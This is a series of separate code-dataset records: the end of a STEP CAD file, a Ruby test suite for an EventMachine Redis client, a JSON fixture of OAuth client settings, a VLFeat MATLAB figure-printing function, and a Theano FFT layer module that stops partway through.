Inner',$,(#873));\r\n#875=PRESENTATION_STYLE_ASSIGNMENT((#877));\r\n#876=PRESENTATION_STYLE_ASSIGNMENT((#878));\r\n#877=SURFACE_STYLE_USAGE(.BOTH.,#879);\r\n#878=SURFACE_STYLE_USAGE(.BOTH.,#880);\r\n#879=SURFACE_SIDE_STYLE('',(#881));\r\n#880=SURFACE_SIDE_STYLE('',(#882));\r\n#881=SURFACE_STYLE_FILL_AREA(#883);\r\n#882=SURFACE_STYLE_FILL_AREA(#884);\r\n#883=FILL_AREA_STYLE('',(#885));\r\n#884=FILL_AREA_STYLE('',(#886));\r\n#885=FILL_AREA_STYLE_COLOUR('',#887);\r\n#886=FILL_AREA_STYLE_COLOUR('',#888);\r\n#887=COLOUR_RGB('',0.749019607843137,0.749019607843137,0.749019607843137);\r\n#888=COLOUR_RGB('',0.945098039215686,0.949019607843137,0.972549019607843);\r\nENDSEC;\r\nEND-ISO-10303-21;\r\n"} {"text": "require File.expand_path(File.dirname(__FILE__) + \"/test_helper.rb\")\nrequire 'logger'\n\nEM.describe EM::Protocols::Redis do\n default_timeout 1\n\n before do\n @r = EM::Protocols::Redis.connect :db => 14\n @r.flushdb\n @r['foo'] = 'bar'\n end\n\n\n should \"be able to provide a logger\" do\n log = StringIO.new\n r = EM::Protocols::Redis.connect :db => 14, :logger => Logger.new(log)\n r.ping do\n log.string.should.include \"ping\"\n done\n end\n end\n\n it \"should be able to PING\" do\n @r.ping { |r| 
r.should == 'PONG'; done }\n end\n\n it \"should be able to GET a key\" do\n @r.get('foo') { |r| r.should == 'bar'; done }\n end\n\n it \"should be able to SET a key\" do\n @r['foo'] = 'nik'\n @r.get('foo') { |r| r.should == 'nik'; done }\n end\n\n it \"should properly handle trailing newline characters\" do\n @r['foo'] = \"bar\\n\"\n @r.get('foo') { |r| r.should == \"bar\\n\"; done }\n end\n\n it \"should store and retrieve all possible characters at the beginning and the end of a string\" do\n (0..255).each do |char_idx|\n string = \"#{char_idx.chr}---#{char_idx.chr}\"\n @r['foo'] = string\n @r.get('foo') { |r| r.should == string }\n end\n @r.ping { done }\n end\n\n it \"should be able to SET a key with an expiry\" do\n timeout(3)\n\n @r.set('foo', 'bar', 1)\n @r.get('foo') { |r| r.should == 'bar' }\n EM.add_timer(2) do\n @r.get('foo') { |r| r.should == nil }\n @r.ping { done }\n end\n end\n\n it \"should be able to return a TTL for a key\" do\n @r.set('foo', 'bar', 1)\n @r.ttl('foo') { |r| r.should == 1; done }\n end\n\n it \"should be able to SETNX\" do\n @r['foo'] = 'nik'\n @r.get('foo') { |r| r.should == 'nik' }\n @r.setnx 'foo', 'bar'\n @r.get('foo') { |r| r.should == 'nik' }\n\n @r.ping { done }\n end\n #\n it \"should be able to GETSET\" do\n @r.getset('foo', 'baz') { |r| r.should == 'bar' }\n @r.get('foo') { |r| r.should == 'baz'; done }\n end\n #\n it \"should be able to INCR a key\" do\n @r.del('counter')\n @r.incr('counter') { |r| r.should == 1 }\n @r.incr('counter') { |r| r.should == 2 }\n @r.incr('counter') { |r| r.should == 3 }\n\n @r.ping { done }\n end\n #\n it \"should be able to INCRBY a key\" do\n @r.del('counter')\n @r.incrby('counter', 1) { |r| r.should == 1 }\n @r.incrby('counter', 2) { |r| r.should == 3 }\n @r.incrby('counter', 3) { |r| r.should == 6 }\n\n @r.ping { done }\n end\n #\n it \"should be able to DECR a key\" do\n @r.del('counter')\n @r.incr('counter') { |r| r.should == 1 }\n @r.incr('counter') { |r| r.should == 2 }\n @r.incr('counter') { |r| r.should == 3 }\n @r.decr('counter') { |r| r.should == 2 }\n @r.decr('counter', 2) { |r| r.should == 0; done }\n end\n #\n it \"should be able to RANDKEY\" do\n @r.randkey { |r| r.should.not == nil; done }\n end\n #\n it \"should be able to RENAME a key\" do\n @r.del 'foo'\n @r.del 'bar'\n @r['foo'] = 'hi'\n @r.rename 'foo', 'bar'\n @r.get('bar') { |r| r.should == 'hi' ; done }\n end\n #\n it \"should be able to RENAMENX a key\" do\n @r.del 'foo'\n @r.del 'bar'\n @r['foo'] = 'hi'\n @r['bar'] = 'ohai'\n @r.renamenx 'foo', 'bar'\n @r.get('bar') { |r| r.should == 'ohai' ; done }\n end\n #\n it \"should be able to get DBSIZE of the database\" do\n dbsize_without_foo, dbsize_with_foo = nil\n @r.delete 'foo'\n @r.dbsize { |r| dbsize_without_foo = r }\n @r['foo'] = 0\n @r.dbsize { |r| dbsize_with_foo = r }\n\n @r.ping do\n dbsize_with_foo.should == dbsize_without_foo + 1\n done\n end\n end\n #\n it \"should be able to EXPIRE a key\" do\n timeout(3)\n\n @r['foo'] = 'bar'\n @r.expire 'foo', 1\n @r.get('foo') { |r| r.should == \"bar\" }\n EM.add_timer(2) do\n @r.get('foo') { |r| r.should == nil }\n @r.ping { done }\n end\n end\n #\n it \"should be able to EXISTS\" do\n @r['foo'] = 'nik'\n @r.exists('foo') { |r| r.should == true }\n @r.del 'foo'\n @r.exists('foo') { |r| r.should == false ; done }\n end\n #\n it \"should be able to KEYS\" do\n @r.keys(\"f*\") { |keys| keys.each { |key| @r.del key } }\n @r['f'] = 'nik'\n @r['fo'] = 'nak'\n @r['foo'] = 'qux'\n @r.keys(\"f*\") { |r| r.sort.should == ['f', 'fo', 'foo'].sort }\n\n 
@r.ping { done }\n end\n #\n it \"should be able to return a random key (RANDOMKEY)\" do\n 3.times do |i|\n @r.randomkey do |r|\n @r.exists(r) do |e|\n e.should == true\n done if i == 2\n end\n end\n end\n end\n #\n it \"should be able to check the TYPE of a key\" do\n @r['foo'] = 'nik'\n @r.type('foo') { |r| r.should == \"string\" }\n @r.del 'foo'\n @r.type('foo') { |r| r.should == \"none\" ; done }\n end\n #\n it \"should be able to push to the head of a list (LPUSH)\" do\n @r.lpush \"list\", 'hello'\n @r.lpush \"list\", 42\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lpop('list') { |r| r.should == '42'; done }\n end\n #\n it \"should be able to push to the tail of a list (RPUSH)\" do\n @r.rpush \"list\", 'hello'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 1 ; done }\n end\n #\n it \"should be able to pop the tail of a list (RPOP)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush\"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.rpop('list') { |r| r.should == 'goodbye'; done }\n end\n #\n it \"should be able to pop the head of a list (LPOP)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lpop('list') { |r| r.should == 'hello'; done }\n end\n #\n it \"should be able to get the length of a list (LLEN)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 ; done }\n end\n #\n it \"should be able to get a range of values from a list (LRANGE)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.rpush \"list\", '1'\n @r.rpush \"list\", '2'\n @r.rpush \"list\", '3'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 5 }\n @r.lrange('list', 2, -1) { |r| r.should == ['1', '2', '3']; done }\n end\n #\n it \"should be able to trim a list (LTRIM)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.rpush \"list\", '1'\n @r.rpush \"list\", '2'\n @r.rpush \"list\", '3'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 5 }\n @r.ltrim 'list', 0, 1\n @r.llen('list') { |r| r.should == 2 }\n @r.lrange('list', 0, -1) { |r| r.should == ['hello', 'goodbye']; done }\n end\n #\n it \"should be able to get a value by indexing into a list (LINDEX)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lindex('list', 1) { |r| r.should == 'goodbye'; done }\n end\n #\n it \"should be able to set a value by indexing into a list (LSET)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'hello'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lset('list', 1, 'goodbye') { |r| r.should == 'OK' }\n @r.lindex('list', 1) { |r| r.should == 'goodbye'; done }\n end\n #\n it \"should be able to remove values from a list (LREM)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lrem('list', 1, 'hello') { |r| r.should == 1 }\n @r.lrange('list', 0, -1) { |r| r.should == ['goodbye']; done }\n end\n\n it \"should be able to pop values from a list and push them onto a temp list(RPOPLPUSH)\" do\n @r.rpush \"list\", 'one'\n @r.rpush \"list\", 
'two'\n @r.rpush \"list\", 'three'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 3 }\n @r.lrange('list', 0, -1) { |r| r.should == ['one', 'two', 'three'] }\n @r.lrange('tmp', 0, -1) { |r| r.should == [] }\n @r.rpoplpush('list', 'tmp') { |r| r.should == 'three' }\n @r.lrange('tmp', 0, -1) { |r| r.should == ['three'] }\n @r.rpoplpush('list', 'tmp') { |r| r.should == 'two' }\n @r.lrange('tmp', 0, -1) { |r| r.should == ['two', 'three'] }\n @r.rpoplpush('list', 'tmp') { |r| r.should == 'one' }\n @r.lrange('tmp', 0, -1) { |r| r.should == ['one', 'two', 'three']; done }\n end\n #\n it \"should be able add members to a set (SADD)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.type('set') { |r| r.should == \"set\" }\n @r.scard('set') { |r| r.should == 2 }\n @r.smembers('set') { |r| r.sort.should == ['key1', 'key2'].sort; done }\n end\n #\n it \"should be able delete members to a set (SREM)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.type('set') { |r| r.should == \"set\" }\n @r.scard('set') { |r| r.should == 2 }\n @r.smembers('set') { |r| r.sort.should == ['key1', 'key2'].sort }\n @r.srem('set', 'key1')\n @r.scard('set') { |r| r.should == 1 }\n @r.smembers('set') { |r| r.should == ['key2']; done }\n end\n #\n it \"should be able to return and remove random key from set (SPOP)\" do\n @r.sadd \"set_pop\", \"key1\"\n @r.sadd \"set_pop\", \"key2\"\n @r.spop(\"set_pop\") { |r| r.should.not == nil }\n @r.scard(\"set_pop\") { |r| r.should == 1; done }\n end\n #\n it \"should be able to return random key without delete the key from a set (SRANDMEMBER)\" do\n @r.sadd \"set_srandmember\", \"key1\"\n @r.sadd \"set_srandmember\", \"key2\"\n @r.srandmember(\"set_srandmember\") { |r| r.should.not == nil }\n @r.scard(\"set_srandmember\") { |r| r.should == 2; done }\n end\n #\n it \"should be able count the members of a set (SCARD)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.type('set') { |r| r.should == \"set\" }\n @r.scard('set') { |r| r.should == 2; done }\n end\n #\n it \"should be able test for set membership (SISMEMBER)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.type('set') { |r| r.should == \"set\" }\n @r.scard('set') { |r| r.should == 2 }\n @r.sismember('set', 'key1') { |r| r.should == true }\n @r.sismember('set', 'key2') { |r| r.should == true }\n @r.sismember('set', 'notthere') { |r| r.should == false; done }\n end\n #\n it \"should be able to do set intersection (SINTER)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.sadd \"set2\", 'key2'\n @r.sinter('set', 'set2') { |r| r.should == ['key2']; done }\n end\n #\n it \"should be able to do set intersection and store the results in a key (SINTERSTORE)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.sadd \"set2\", 'key2'\n @r.sinterstore('newone', 'set', 'set2') { |r| r.should == 1 }\n @r.smembers('newone') { |r| r.should == ['key2']; done }\n end\n #\n it \"should be able to do set union (SUNION)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.sadd \"set2\", 'key2'\n @r.sadd \"set2\", 'key3'\n @r.sunion('set', 'set2') { |r| r.sort.should == ['key1','key2','key3'].sort; done }\n end\n #\n it \"should be able to do set union and store the results in a key (SUNIONSTORE)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.sadd \"set2\", 'key2'\n @r.sadd \"set2\", 'key3'\n @r.sunionstore('newone', 'set', 'set2') { |r| r.should == 3 }\n @r.smembers('newone') { |r| r.sort.should == 
['key1','key2','key3'].sort; done }\n end\n #\n it \"should be able to do set difference (SDIFF)\" do\n @r.sadd \"set\", 'a'\n @r.sadd \"set\", 'b'\n @r.sadd \"set2\", 'b'\n @r.sadd \"set2\", 'c'\n @r.sdiff('set', 'set2') { |r| r.should == ['a']; done }\n end\n #\n it \"should be able to do set difference and store the results in a key (SDIFFSTORE)\" do\n @r.sadd \"set\", 'a'\n @r.sadd \"set\", 'b'\n @r.sadd \"set2\", 'b'\n @r.sadd \"set2\", 'c'\n @r.sdiffstore('newone', 'set', 'set2')\n @r.smembers('newone') { |r| r.should == ['a']; done }\n end\n #\n it \"should be able move elements from one set to another (SMOVE)\" do\n @r.sadd 'set1', 'a'\n @r.sadd 'set1', 'b'\n @r.sadd 'set2', 'x'\n @r.smove('set1', 'set2', 'a') { |r| r.should == true }\n @r.sismember('set2', 'a') { |r| r.should == true }\n @r.delete('set1') { done }\n end\n #\n it \"should be able to do crazy SORT queries\" do\n # The 'Dogs' is capitialized on purpose\n @r['dog_1'] = 'louie'\n @r.rpush 'Dogs', 1\n @r['dog_2'] = 'lucy'\n @r.rpush 'Dogs', 2\n @r['dog_3'] = 'max'\n @r.rpush 'Dogs', 3\n @r['dog_4'] = 'taj'\n @r.rpush 'Dogs', 4\n @r.sort('Dogs', :get => 'dog_*', :limit => [0,1]) { |r| r.should == ['louie'] }\n @r.sort('Dogs', :get => 'dog_*', :limit => [0,1], :order => 'desc alpha') { |r| r.should == ['taj'] }\n @r.ping { done }\n end\n\n it \"should be able to handle array of :get using SORT\" do\n @r['dog:1:name'] = 'louie'\n @r['dog:1:breed'] = 'mutt'\n @r.rpush 'dogs', 1\n @r['dog:2:name'] = 'lucy'\n @r['dog:2:breed'] = 'poodle'\n @r.rpush 'dogs', 2\n @r['dog:3:name'] = 'max'\n @r['dog:3:breed'] = 'hound'\n @r.rpush 'dogs', 3\n @r['dog:4:name'] = 'taj'\n @r['dog:4:breed'] = 'terrier'\n @r.rpush 'dogs', 4\n @r.sort('dogs', :get => ['dog:*:name', 'dog:*:breed'], :limit => [0,1]) { |r| r.should == ['louie', 'mutt'] }\n @r.sort('dogs', :get => ['dog:*:name', 'dog:*:breed'], :limit => [0,1], :order => 'desc alpha') { |r| r.should == ['taj', 'terrier'] }\n @r.ping { done }\n end\n #\n it \"should be able count the members of a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.zset_add 'zset', 1, 'set'\n @r.zset_count('zset') { |r| r.should == 1 }\n @r.delete('set')\n @r.delete('zset') { done }\n end\n # \n it \"should be able add members to a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.zset_add 'zset', 1, 'set'\n @r.zset_range('zset', 0, 1) { |r| r.should == ['set'] }\n @r.zset_count('zset') { |r| r.should == 1 }\n @r.delete('set')\n @r.delete('zset') { done }\n end\n # \n it \"should be able delete members to a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.type?('set') { |r| r.should == \"set\" }\n @r.set_add \"set2\", 'key3'\n @r.set_add \"set2\", 'key4'\n @r.type?('set2') { |r| r.should == \"set\" }\n @r.zset_add 'zset', 1, 'set'\n @r.zset_count('zset') { |r| r.should == 1 }\n @r.zset_add 'zset', 2, 'set2'\n @r.zset_count('zset') { |r| r.should == 2 }\n @r.zset_delete 'zset', 'set'\n @r.zset_count('zset') { |r| r.should == 1 }\n @r.delete('set')\n @r.delete('set2')\n @r.delete('zset') { done }\n end\n # \n it \"should be able to get a range of values from a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.set_add \"set2\", 'key3'\n @r.set_add \"set2\", 'key4'\n @r.set_add \"set3\", 'key1'\n @r.type?('set') { |r| r.should == 'set' }\n @r.type?('set2') { |r| r.should == 'set' }\n @r.type?('set3') { |r| r.should == 'set' }\n @r.zset_add 'zset', 1, 'set'\n @r.zset_add 'zset', 2, 'set2'\n @r.zset_add 'zset', 3, 'set3'\n 
@r.zset_count('zset') { |r| r.should == 3 }\n @r.zset_range('zset', 0, 3) { |r| r.should == ['set', 'set2', 'set3'] }\n @r.delete('set')\n @r.delete('set2')\n @r.delete('set3')\n @r.delete('zset') { done }\n end\n # \n it \"should be able to get a reverse range of values from a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.set_add \"set2\", 'key3'\n @r.set_add \"set2\", 'key4'\n @r.set_add \"set3\", 'key1'\n @r.type?('set') { |r| r.should == 'set' }\n @r.type?('set2') { |r| r.should == 'set' }\n @r.type?('set3') { |r| r.should == 'set' }\n @r.zset_add 'zset', 1, 'set'\n @r.zset_add 'zset', 2, 'set2'\n @r.zset_add 'zset', 3, 'set3'\n @r.zset_count('zset') { |r| r.should == 3 }\n @r.zset_reverse_range('zset', 0, 3) { |r| r.should == ['set3', 'set2', 'set'] }\n @r.delete('set')\n @r.delete('set2')\n @r.delete('set3')\n @r.delete('zset') { done }\n end\n # \n it \"should be able to get a range by score of values from a zset\" do\n @r.set_add \"set\", 'key1'\n @r.set_add \"set\", 'key2'\n @r.set_add \"set2\", 'key3'\n @r.set_add \"set2\", 'key4'\n @r.set_add \"set3\", 'key1'\n @r.set_add \"set4\", 'key4'\n @r.zset_add 'zset', 1, 'set'\n @r.zset_add 'zset', 2, 'set2'\n @r.zset_add 'zset', 3, 'set3'\n @r.zset_add 'zset', 4, 'set4'\n @r.zset_count('zset') { |r| r.should == 4 }\n @r.zset_range_by_score('zset', 2, 3) { |r| r.should == ['set2', 'set3'] }\n @r.delete('set')\n @r.delete('set2')\n @r.delete('set3')\n @r.delete('set4')\n @r.delete('zset') { done }\n end\n #\n it \"should be able to get a score for a specific value in a zset (ZSCORE)\" do\n @r.zset_add \"zset\", 23, \"value\"\n @r.zset_score(\"zset\", \"value\") { |r| r.should == \"23\" }\n\n @r.zset_score(\"zset\", \"value2\") { |r| r.should == nil }\n @r.zset_score(\"unknown_zset\", \"value\") { |r| r.should == nil }\n\n @r.delete(\"zset\") { done }\n end\n #\n it \"should be able to increment a range score of a zset (ZINCRBY)\" do\n # create a new zset\n @r.zset_increment_by \"hackers\", 1965, \"Yukihiro Matsumoto\"\n @r.zset_score(\"hackers\", \"Yukihiro Matsumoto\") { |r| r.should == \"1965\" }\n\n # add a new element\n @r.zset_increment_by \"hackers\", 1912, \"Alan Turing\"\n @r.zset_score(\"hackers\", \"Alan Turing\") { |r| r.should == \"1912\" }\n\n # update the score\n @r.zset_increment_by \"hackers\", 100, \"Alan Turing\" # yeah, we are making Turing a bit younger\n @r.zset_score(\"hackers\", \"Alan Turing\") { |r| r.should == \"2012\" }\n\n # attempt to update a key that's not a zset\n @r[\"i_am_not_a_zet\"] = \"value\"\n # shouldn't raise error anymore\n @r.zset_incr_by(\"i_am_not_a_zet\", 23, \"element\") { |r| r.should == nil }\n\n @r.delete(\"hackers\")\n @r.delete(\"i_am_not_a_zet\") { done }\n end\n #\n it \"should provide info (INFO)\" do\n @r.info do |r|\n [:last_save_time, :redis_version, :total_connections_received, :connected_clients, :total_commands_processed, :connected_slaves, :uptime_in_seconds, :used_memory, :uptime_in_days, :changes_since_last_save].each do |x|\n r.keys.include?(x).should == true\n end\n done\n end\n end\n #\n it \"should be able to flush the database (FLUSHDB)\" do\n @r['key1'] = 'keyone'\n @r['key2'] = 'keytwo'\n @r.keys('*') { |r| r.sort.should == ['foo', 'key1', 'key2'].sort } #foo from before\n @r.flushdb\n @r.keys('*') { |r| r.should == []; done }\n end\n #\n it \"should be able to SELECT database\" do\n @r.select(15)\n @r.get('foo') { |r| r.should == nil; done }\n end\n #\n it \"should be able to provide the last save time (LASTSAVE)\" do\n @r.lastsave do 
|savetime|\n Time.at(savetime).class.should == Time\n Time.at(savetime).should <= Time.now\n done\n end\n end\n\n it \"should be able to MGET keys\" do\n @r['foo'] = 1000\n @r['bar'] = 2000\n @r.mget('foo', 'bar') { |r| r.should == ['1000', '2000'] }\n @r.mget('foo', 'bar', 'baz') { |r| r.should == ['1000', '2000', nil] }\n @r.ping { done }\n end\n\n it \"should be able to mapped MGET keys\" do\n @r['foo'] = 1000\n @r['bar'] = 2000\n @r.mapped_mget('foo', 'bar') { |r| r.should == { 'foo' => '1000', 'bar' => '2000'} }\n @r.mapped_mget('foo', 'baz', 'bar') { |r| r.should == { 'foo' => '1000', 'bar' => '2000'} }\n @r.ping { done }\n end\n\n it \"should be able to MSET values\" do\n @r.mset :key1 => \"value1\", :key2 => \"value2\"\n @r.get('key1') { |r| r.should == \"value1\" }\n @r.get('key2') { |r| r.should == \"value2\"; done }\n end\n\n it \"should be able to MSETNX values\" do\n @r.msetnx :keynx1 => \"valuenx1\", :keynx2 => \"valuenx2\"\n @r.mget('keynx1', 'keynx2') { |r| r.should == [\"valuenx1\", \"valuenx2\"] }\n\n @r[\"keynx1\"] = \"value1\"\n @r[\"keynx2\"] = \"value2\"\n @r.msetnx :keynx1 => \"valuenx1\", :keynx2 => \"valuenx2\"\n @r.mget('keynx1', 'keynx2') { |r| r.should == [\"value1\", \"value2\"]; done }\n end\n\n it \"should bgsave\" do\n @r.bgsave do |r|\n ['OK', 'Background saving started'].include?(r).should == true\n done\n end\n end\n\n it \"should be able to ECHO\" do\n @r.echo(\"message in a bottle\\n\") { |r| r.should == \"message in a bottle\\n\"; done }\n end\n\n # Tests are disabled due uncatchable exceptions. We should use on_error callback,\n # intead of raising exceptions in random places.\n #\n # it \"should raise error when invoke MONITOR\" do\n # # lambda { @r.monitor }.should.raise\n # done\n # end\n # \n # it \"should raise error when invoke SYNC\" do\n # # lambda { @r.sync }.should.raise\n # done\n # end\n\n it \"should work with 10 commands\" do\n @r.call_commands((1..10).map { |i|\n ['get', \"foo\"]\n }) do |rs|\n rs.length.should == 10\n rs.each { |r| r.should == \"bar\" }\n done\n end\n end\n it \"should work with 1 command\" do\n @r.call_commands([['get', \"foo\"]]) do |rs|\n rs.length.should == 1\n rs[0].should == \"bar\"\n done\n end\n end\n it \"should work with zero commands\" do\n @r.call_commands([]) do |rs|\n rs.should == []\n done\n end\n end\nend\n"} {"text": "[\n {\n \"scope\": [\n \"clients.read\",\n \"clients.write\"\n ],\n \"client_id\": \"14pnUs\",\n \"resource_ids\": [\n \"none\"\n ],\n \"authorized_grant_types\": [\n \"client_credentials\"\n ],\n \"redirect_uri\": [\n \"http*://ant.path.wildcard/**/passback/*\",\n \"http://test1.com\"\n ],\n \"autoapprove\": [\n \"true\"\n ],\n \"authorities\": [\n \"clients.read\",\n \"clients.write\"\n ],\n \"token_salt\": \"erRsWH\",\n \"allowedproviders\": [\n \"uaa\",\n \"ldap\",\n \"my-saml-provider\"\n ],\n \"name\": \"My Client Name\",\n \"lastModified\": 1468364444218\n },\n {\n \"scope\": [\n \"clients.read\",\n \"clients.write\"\n ],\n \"client_id\": \"0Tgnfy\",\n \"resource_ids\": [\n \"none\"\n ],\n \"authorized_grant_types\": [\n \"client_credentials\"\n ],\n \"redirect_uri\": [\n \"http*://ant.path.wildcard/**/passback/*\",\n \"http://test1.com\"\n ],\n \"autoapprove\": [\n \"true\"\n ],\n \"authorities\": [\n \"clients.read\",\n \"new.authority\",\n \"clients.write\"\n ],\n \"token_salt\": \"4wMTwN\",\n \"allowedproviders\": [\n \"uaa\",\n \"ldap\",\n \"my-saml-provider\"\n ],\n \"name\": \"My Client Name\",\n \"lastModified\": 1468364444318\n }\n]"} {"text": "function 
vl_demo_print(varargin)\n% VL_DEMO_PRINT\n% VL_DEMO_PRINT(NAME) prints the current figure to the documentation\n% directory with the specified filename, assuming that the global\n% variable VL_DEMO_PRINT is defined and non-empty when MATLAB is\n% started (our using SETENV() from MATLAB). Otherwise the function\n% flushes the displays and returns.\n%\n% VL_DEMO_PRINT(NAME, R) specifies a magnification factor R, setting\n% the figure width relatively to the page width. If not specified, R\n% is assumed to be 1/2.\n%\n% Remarks:: The figure paper type is set to letter, that has size 8.5 x\n% 11 inches. When converted for web viewing, images are rasterized\n% at either 75 or 95 DPI, The documentation system converts images\n% to bitmap with a resolution of 75 DPI, which makes a letter size\n% page 637 or 808 pixels large, repsectively.\n%\n% In MATLAB font sizes are usually expressed in points, where a\n% point is a 1/72 inch. Thus a 12pt font sampled at 75 DPI is\n% about 12.5 pixels high.\n\n% Copyright (C) 2007-12 Andrea Vedaldi and Brian Fulkerson.\n% All rights reserved.\n%\n% This file is part of the VLFeat library and is made available under\n% the terms of the BSD license (see the COPYING file).\n\nif isempty(getenv('VL_DEMO_PRINT'))\n drawnow ;\n return ;\nend\n\nif isa(varargin{1}, 'double')\n fig = varargin{1} ;\n varargin(1) = [] ;\nelse\n fig = gcf ;\nend\n\nname = varargin{1} ;\n\nif length(varargin) < 2\n figurePaperSize = 0.5 ;\nelse\n figurePaperSize = varargin{2} ;\nend\n\nvl_printsize(fig, figurePaperSize) ;\n\nfigDir = fullfile(vl_root,'doc','demo') ;\nif ~ exist(figDir, 'dir')\n mkdir(figDir) ;\nend\n\nif 0\n filePath = fullfile(figDir, [name '.eps']) ;\n print(fig, '-depsc2', filePath) ;\nelse\n filePath = fullfile(figDir, [name '.jpg']) ;\n print(fig, '-djpeg95', filePath, '-r95') ;\nend\nfprintf('%s: wrote file ''%s''\\n', mfilename, filePath) ;\n"} {"text": "import numpy as np\nimport theano\nimport theano.tensor as T\nfrom utils.mymath import fourier_matrix, inverse_fourier_matrix\nfrom lasagne.layers import Layer\n\n# Ugly but works for now\ntry:\n import pygpu\n import pycuda.driver\n import skcuda\n from skcuda import fft\n cufft_available = True\nexcept ImportError:\n cufft_available = False\n\nif theano.config.device == 'cuda' and cufft_available:\n from cascadenet.network.theano_extensions.gpuarray.fft2 import cufft2 as fft2g\n from cascadenet.network.theano_extensions.gpuarray.fft2 import cuifft2 as ifft2g\n use_cuda = True\n print \"Using GPU version of fft layers\"\nelse:\n from cascadenet.network.theano_extensions.fft2_lasagne import fft2, ifft2\n use_cuda = False\n print \"Using CPU version of fft layers\"\n\n\nfrom cascadenet.network.theano_extensions.fft_helper import fftshift, ifftshift\nfrom cascadenet.network.theano_extensions.fft import fft, ifft\n\n\nclass FFTLayer(Layer):\n def __init__(self, incoming, data_shape, inv=False, **kwargs):\n '''\n Need to take input shape of the fft, since it needs to\n precompute fft matrix\n '''\n super(FFTLayer, self).__init__(incoming, **kwargs)\n self.data_shape = data_shape\n n, _, nx, ny = data_shape\n # create matrix which performs fft\n\n if inv:\n fourier_mat = inverse_fourier_matrix(nx, ny)\n else:\n fourier_mat = fourier_matrix(nx, ny)\n\n self.real_fft = np.real(fourier_mat)\n self.complex_fft = np.imag(fourier_mat)\n\n def transform(self, input):\n '''\n Perform fourier transform using Fourier matrix\n\n Parameters\n ------------------------------\n input must be of 4d tensor\n with shape [n, 2, nx, ny] 
where [nx, ny] == self.data_shape. n means\n number of data. 2 means channels for real and complex part of the input\n (channel 1 == real, channel 2 = complex)\n uses real values to simulate the complex operation\n\n Returns\n ------------------------------\n tensor of the shape [n, 2, nx, ny] which is equivalent to\n fourier transform\n\n '''\n in_r = input[0]\n in_c = input[1]\n real_fft = self.real_fft\n complex_fft = self.complex_fft\n out_r = T.dot(real_fft, in_r) - T.dot(complex_fft, in_c)\n out_c = T.dot(complex_fft, in_r) + T.dot(real_fft, in_c)\n return T.stack([out_r, out_c])\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes FFT. Input layer must have dimension [n, 2, nx, ny]\n '''\n out, updates = theano.scan(self.transform, sequences=input)\n return out\n\n\nclass FFT2CPULayer(Layer):\n def __init__(self, incoming, data_shape, inv=False,\n norm='ortho', **kwargs):\n '''\n Need to take input shape of the fft,\n since it needs to precompute fft matrix\n\n if nx != ny, we need to matrices\n\n '''\n super(FFT2Layer, self).__init__(incoming, **kwargs)\n self.fn = fft2 if not inv else ifft2\n self.norm = norm\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes 2D FFT. Input layer must have dimension (n, 2, nx, ny[, nt])\n '''\n return self.fn(input, norm=self.norm)\n\n\nclass FFT2GPULayer(Layer):\n def __init__(self, incoming, data_shape, inv=False,\n norm='ortho', **kwargs):\n '''\n Need to take input shape of the fft,\n since it needs to precompute fft matrix\n\n if nx != ny, we need to matrices\n\n '''\n super(FFT2Layer, self).__init__(incoming, **kwargs)\n self.fn = fft2g if not inv else ifft2g\n self.is_3d = len(data_shape) == 5\n self.norm = norm\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes 2D FFT. Input layer must have dimension (n, 2, nx, ny[, nt])\n '''\n if self.is_3d:\n input_fft = input.dimshuffle((0, 4, 2, 3, 1))\n res = self.fn(input_fft, norm=self.norm)\n return res.dimshuffle((0, 4, 2, 3, 1))\n else:\n input_fft = input.dimshuffle((0, 2, 3, 1))\n res = self.fn(input_fft, norm=self.norm)\n return res.dimshuffle((0, 3, 1, 2))\n\n\nclass FT2Layer(Layer):\n def __init__(self, incoming, data_shape, inv=False, **kwargs):\n '''\n Need to take input shape of the fft,\n since it needs 